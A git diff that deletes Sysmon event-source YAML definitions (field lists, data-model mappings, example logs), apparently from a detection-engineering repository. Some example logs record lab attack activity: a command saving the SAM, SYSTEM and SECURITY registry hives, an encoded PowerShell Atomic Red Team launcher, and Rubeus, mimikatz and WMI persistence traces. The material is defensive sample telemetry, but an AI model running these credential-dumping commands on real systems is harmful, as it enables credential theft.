-  - LogonGuid
-  - LogonId
-  - MD5
-  - Name
-  - Opcode
-  - OriginalFileName
-  - ParentCommandLine
-  - ParentImage
-  - ParentProcessGuid
-  - ParentProcessId
-  - ProcessGuid
-  - ProcessID
-  - ProcessId
-  - Product
-  - RecordID
-  - RecordNumber
-  - RuleName
-  - SHA256
-  - SecurityID
-  - SystemTime
-  - System_Props_Xml
-  - Task
-  - TerminalSessionId
-  - ThreadID
-  - TimeCreated
-  - User
-  - UserID
-  - UtcTime
-  - Version
-  - action
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest
-  - dvc_nt_host
-  - event_id
-  - eventtype
-  - host
-  - id
-  - index
-  - linecount
-  - original_file_name
-  - os
-  - parent_process
-  - parent_process_exec
-  - parent_process_guid
-  - parent_process_id
-  - parent_process_name
-  - parent_process_path
-  - process
-  - process_current_directory
-  - process_exec
-  - process_guid
-  - process_hash
-  - process_id
-  - process_integrity_level
-  - process_name
-  - process_path
-  - punct
-  - signature
-  - signature_id
-  - source
-  - sourcetype
-  - splunk_server
-  - tag
-  - tag::eventtype
-  - timeendpos
-  - timestartpos
-  - user
-  - user_id
-  - vendor_product
-field_mappings:
-  - data_model: cim
-    data_set: Endpoint.Processes
-    mapping:
-      ProcessGuid: Processes.process_guid
-      ProcessId: Processes.process_id
-      Image: Processes.process_path
-      Image|endswith: Processes.process_name
-      CommandLine: Processes.process
-      CurrentDirectory: Processes.process_current_directory
-      User: Processes.user
-      IntegrityLevel: Processes.process_integrity_level
-      Hashes: Processes.process_hash
-      ParentProcessGuid: Processes.parent_process_guid
-      ParentProcessId: Processes.parent_process_id
-      ParentImage: Processes.parent_process_name
-      ParentCommandLine: Processes.parent_process
-      Computer: Processes.dest
-      OriginalFileName: Processes.original_file_name
-convert_to_log_source:
-  - data_source: Windows Event Log Security 4688
-    mapping:
-      ProcessId: NewProcessId
-      Image: NewProcessName
-      Image|endswith: NewProcessName|endswith
-      CommandLine: Process_Command_Line
-      User: SubjectUserSid
-      ParentProcessId: ProcessId
-      ParentImage: ParentProcessName
-      ParentImage|endswith: ParentProcessName|endswith
-      Computer: Computer
-      OriginalFileName: NewProcessName|endswith
-  - data_source: Crowdstrike Process
-    mapping:
-      ProcessId: RawProcessId
-      Image: ImageFileName
-      CommandLine: CommandLine
-      User: UserSid
-      ParentProcessId: ParentProcessId
-      ParentImage: ParentBaseFileName
-example_log: "<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>1</EventID><Version>5</Version><Level>4</Level><Task>1</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2020-10-08T11:03:46.617920300Z'/><EventRecordID>4522</EventRecordID><Correlation/><Execution ProcessID='2912' ThreadID='3424'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-6764986.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2020-10-08 11:03:46.615</Data><Data Name='ProcessGuid'>{96128EA2-F212-5F7E-E400-000000007F01}</Data><Data Name='ProcessId'>2296</Data><Data Name='Image'>C:\\Windows\\System32\\cmd.exe</Data><Data Name='FileVersion'>10.0.14393.0 (rs1_release.160715-1616)</Data><Data Name='Description'>Windows Command Processor</Data><Data Name='Product'>Microsoft\xAE Windows\xAE Operating System</Data><Data Name='Company'>Microsoft Corporation</Data><Data Name='OriginalFileName'>Cmd.Exe</Data><Data Name='CommandLine'>\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam %%temp%%\\sam &amp; reg save HKLM\\system %%temp%%\\system &amp; reg save HKLM\\security %%temp%%\\security\" </Data><Data Name='CurrentDirectory'>C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\</Data><Data Name='User'>ATTACKRANGE\\Administrator</Data><Data Name='LogonGuid'>{96128EA2-F210-5F7E-ACD4-080000000000}</Data><Data Name='LogonId'>0x8d4ac</Data><Data Name='TerminalSessionId'>0</Data><Data Name='IntegrityLevel'>High</Data><Data Name='Hashes'>MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A</Data><Data Name='ParentProcessGuid'>{96128EA2-F211-5F7E-DF00-000000007F01}</Data><Data Name='ParentProcessId'>4624</Data><Data Name='ParentImage'>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Data><Data Name='ParentCommandLine'>\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADAAMwAuADAAMAAyACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==</Data></EventData></Event>"
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_10.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_10.yml
deleted file mode 100644
index 7261f3945e..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_10.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-event_name: Sysmon EventID 10
-fields:
-- _time
-- CallTrace
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- GrantedAccess
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SourceImage
-- SourceProcessGUID
-- SourceProcessId
-- SourceThreadId
-- SystemTime
-- System_Props_Xml
-- TargetImage
-- TargetProcessGUID
-- TargetProcessId
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- granted_access
-- host
-- id
-- index
-- linecount
-- os
-- parent_process_exec
-- parent_process_guid
-- parent_process_id
-- parent_process_name
-- parent_process_path
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>10</EventID><Version>3</Version><Level>4</Level><Task>10</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2022-02-01T21:01:44.672666100Z'/><EventRecordID>150624412</EventRecordID><Correlation/><Execution ProcessID='2992' ThreadID='3220'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-128.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-02-01 21:01:44.670</Data><Data Name='SourceProcessGUID'>{3BF36828-9F6D-61F9-390A-02000000CF01}</Data><Data Name='SourceProcessId'>1272</Data><Data Name='SourceThreadId'>956</Data><Data Name='SourceImage'>C:\Tools\Rubeus.exe</Data><Data Name='TargetProcessGUID'>{3BF36828-4B37-61E8-0900-00000000CF01}</Data><Data Name='TargetProcessId'>572</Data><Data Name='TargetImage'>C:\Windows\system32\winlogon.exe</Data><Data Name='GrantedAccess'>0x1f3fff</Data><Data Name='CallTrace'>C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c01f5|UNKNOWN(00007FFD8E245F0C)</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_11.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_11.yml
deleted file mode 100644
index 493b8dc4b6..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_11.yml
+++ /dev/null
@@ -1,82 +0,0 @@
-event_name: Sysmon EventID 11
-fields:
-- _time
-- Channel
-- Computer
-- CreationUtcTime
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetFilename
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- file_create_time
-- file_name
-- file_path
-- host
-- id
-- index
-- linecount
-- object_category
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-field_mappings:
-- data_model: cim
-  data_set: Endpoint.Filesystem
-  mapping:
-    Computer: Filesystem.dest
-    ProcessGuid: Filesystem.process_guid
-    ProcessId: Filesystem.process_id
-    TargetFilename: Filesystem.file_path
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>11</EventID><Version>2</Version><Level>4</Level><Task>11</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2023-02-08T13:01:11.065939500Z'/><EventRecordID>7712490</EventRecordID><Correlation/><Execution ProcessID='2940' ThreadID='3376'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-mhaag-attack-range-84.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>Downloads</Data><Data Name='UtcTime'>2023-02-08 13:01:11.053</Data><Data Name='ProcessGuid'>{0F9A6540-A70E-63E2-3091-00000000BD02}</Data><Data Name='ProcessId'>9332</Data><Data Name='Image'>C:\Users\Administrator\Downloads\mimikatz_trunk\x64\mimikatz.exe</Data><Data Name='TargetFilename'>C:\Users\Administrator\Downloads\mimikatz_trunk\x64\CURRENT_USER_My_4_atomic@art2.local.pfx</Data><Data Name='CreationUtcTime'>2023-02-08 13:01:11.053</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_12.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_12.yml
deleted file mode 100644
index 433e2e81c9..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_12.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: Sysmon EventID 12
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetObject
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object_category
-- object_path
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- registry_hive
-- registry_key_name
-- registry_path
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>12</EventID><Version>2</Version><Level>4</Level><Task>12</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2021-07-12T08:10:32.607068200Z'/><EventRecordID>1055579</EventRecordID><Correlation/><Execution ProcessID='1152' ThreadID='1212'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-890.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>DeleteKey</Data><Data Name='UtcTime'>2021-07-12 08:10:32.592</Data><Data Name='ProcessGuid'>{466BC892-F8F2-60EB-107E-00000000CF01}</Data><Data Name='ProcessId'>10188</Data><Data Name='Image'>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data><Data Name='TargetObject'>HKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\exefile\shell\runas\command</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_13.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_13.yml
deleted file mode 100644
index acfd86bb0f..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_13.yml
+++ /dev/null
@@ -1,93 +0,0 @@
-event_name: Sysmon EventID 13
-fields:
-- _time
-- Channel
-- Computer
-- Details
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RegistryValueData
-- RegistryValueType
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetObject
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object_category
-- object_path
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- registry_hive
-- registry_key_name
-- registry_path
-- registry_value_data
-- registry_value_name
-- registry_value_type
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-field_mappings:
-- data_model: cim
-  data_set: Endpoint.Registry
-  mapping:
-    Computer: Registry.dest
-    ProcessGuid: Registry.process_guid
-    ProcessId: Registry.process_id
-    TargetObject: Registry.registry_path
-    Details: Registry.registry_value_data 
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>13</EventID><Version>2</Version><Level>4</Level><Task>13</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2021-07-12T08:11:04.548083500Z'/><EventRecordID>810987</EventRecordID><Correlation/><Execution ProcessID='2012' ThreadID='2712'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-host-623.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>SetValue</Data><Data Name='UtcTime'>2021-07-12 08:11:04.547</Data><Data Name='ProcessGuid'>{0C1E0330-048F-60E8-0B00-00000000D001}</Data><Data Name='ProcessId'>628</Data><Data Name='Image'>C:\Windows\system32\lsass.exe</Data><Data Name='TargetObject'>HKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHigh</Data><Data Name='Details'>QWORD (0x01d776fd-0xd724b8c5)</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_15.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_15.yml
deleted file mode 100644
index 2fe8d4440e..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_15.yml
+++ /dev/null
@@ -1,79 +0,0 @@
-event_name: Sysmon EventID 15
-fields:
-- _time
-- Channel
-- Computer
-- Contents
-- CreationUtcTime
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Hash
-- IMPHASH
-- Image
-- Keywords
-- Level
-- MD5
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SHA256
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetFilename
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- file_create_time
-- file_hash
-- file_name
-- file_path
-- host
-- id
-- index
-- linecount
-- os
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>15</EventID><Version>2</Version><Level>4</Level><Task>15</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2021-04-28T20:11:34.709744300Z'/><EventRecordID>667860</EventRecordID><Correlation/><Execution ProcessID='1952' ThreadID='2428'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>project-mumbai-host</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2021-04-28 20:11:34.709</Data><Data Name='ProcessGuid'>{ED2ECF8A-C154-6089-F967-00000000BB01}</Data><Data Name='ProcessId'>7000</Data><Data Name='Image'>C:\Users\DefaultAccount\AppData\Roaming\Telegram Desktop\Telegram.exe</Data><Data Name='TargetFilename'>C:\Users\DefaultAccount\Downloads\Telegram Desktop\Good(NLA).txt:Zone.Identifier</Data><Data Name='CreationUtcTime'>2021-04-28 20:11:33.238</Data><Data Name='Hash'>MD5=C785C55D5FA3443A11B8417209C4B524,SHA256=D07777E0DC36EBECCE3FA9644F0F44DC4A0B7EDE0CBC1F5D33E8D6CB07AF5B5C,IMPHASH=00000000000000000000000000000000</Data><Data Name='Contents'>[ZoneTransfer]  ZoneId=3  </Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_17.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_17.yml
deleted file mode 100644
index 1aec8deb23..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_17.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: Sysmon EventID 17
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- PipeName
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- pipe_name
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>17</EventID><Version>1</Version><Level>4</Level><Task>17</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2021-04-19T21:00:18.288457000Z'/><EventRecordID>162168</EventRecordID><Correlation/><Execution ProcessID='2816' ThreadID='2452'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-982.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>CreatePipe</Data><Data Name='UtcTime'>2021-04-19 21:00:18.288</Data><Data Name='ProcessGuid'>{761B69BB-EF62-607D-B211-00000000BA01}</Data><Data Name='ProcessId'>6960</Data><Data Name='PipeName'>\MSSE-1516-server</Data><Data Name='Image'>C:\Users\Administrator\Desktop\beacon.exe</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_18.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_18.yml
deleted file mode 100644
index b7dd594cfe..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_18.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: Sysmon EventID 18
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- PipeName
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- pipe_name
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>18</EventID><Version>1</Version><Level>4</Level><Task>18</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2021-04-19T21:00:19.312721800Z'/><EventRecordID>162173</EventRecordID><Correlation/><Execution ProcessID='2816' ThreadID='2452'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-982.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>ConnectPipe</Data><Data Name='UtcTime'>2021-04-19 21:00:19.312</Data><Data Name='ProcessGuid'>{761B69BB-EF62-607D-B211-00000000BA01}</Data><Data Name='ProcessId'>6960</Data><Data Name='PipeName'>\MSSE-1516-server</Data><Data Name='Image'>C:\Users\Administrator\Desktop\beacon.exe</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_20.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_20.yml
deleted file mode 100644
index 92d3ee6374..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_20.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: Sysmon EventID 20
-fields:
-- _time
-- Channel
-- Computer
-- Destination
-- DestinationNoQuotes
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- Operation
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- Type
-- User
-- UserID
-- UtcTime
-- Version
-- action
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object
-- object_category
-- object_path
-- punct
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_name
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>20</EventID><Version>3</Version><Level>4</Level><Task>20</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2020-12-08T13:54:48.517698800Z'/><EventRecordID>6249</EventRecordID><Correlation/><Execution ProcessID='2504' ThreadID='3252'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-935.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>WmiConsumerEvent</Data><Data Name='UtcTime'>2020-12-08 13:54:48.514</Data><Data Name='Operation'>Deleted</Data><Data Name='User'>ATTACKRANGE\Administrator</Data><Data Name='Name'> "AtomicRedTeam-WMIPersistence-Example"</Data><Data Name='Type'>Command Line</Data><Data Name='Destination'> "C:\\Windows\\System32\\notepad.exe"</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_21.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_21.yml
deleted file mode 100644
index 46a012ce43..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_21.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: Sysmon EventID 21
-fields:
-- _time
-- Channel
-- Computer
-- Consumer
-- ConsumerNoQuotes
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Filter
-- FilterNoQuotes
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- Operation
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- object_path
-- punct
-- result
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_name
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>21</EventID><Version>3</Version><Level>4</Level><Task>21</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated SystemTime='2021-06-16T21:46:50.225290200Z'/><EventRecordID>151644</EventRecordID><Correlation/><Execution ProcessID='1972' ThreadID='3648'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-host-14.attackrange.local</Computer><Security UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='EventType'>WmiBindingEvent</Data><Data Name='UtcTime'>2021-06-16 21:46:50.222</Data><Data Name='Operation'>Modified</Data><Data Name='User'>WIN-HOST-14\Administrator</Data><Data Name='Consumer'> "CommandLineEventConsumer.Name=\"Evil Persistence\""</Data><Data Name='Filter'> "__EventFilter.Name=\"Evil Persistence\""</Data></EventData></Event>
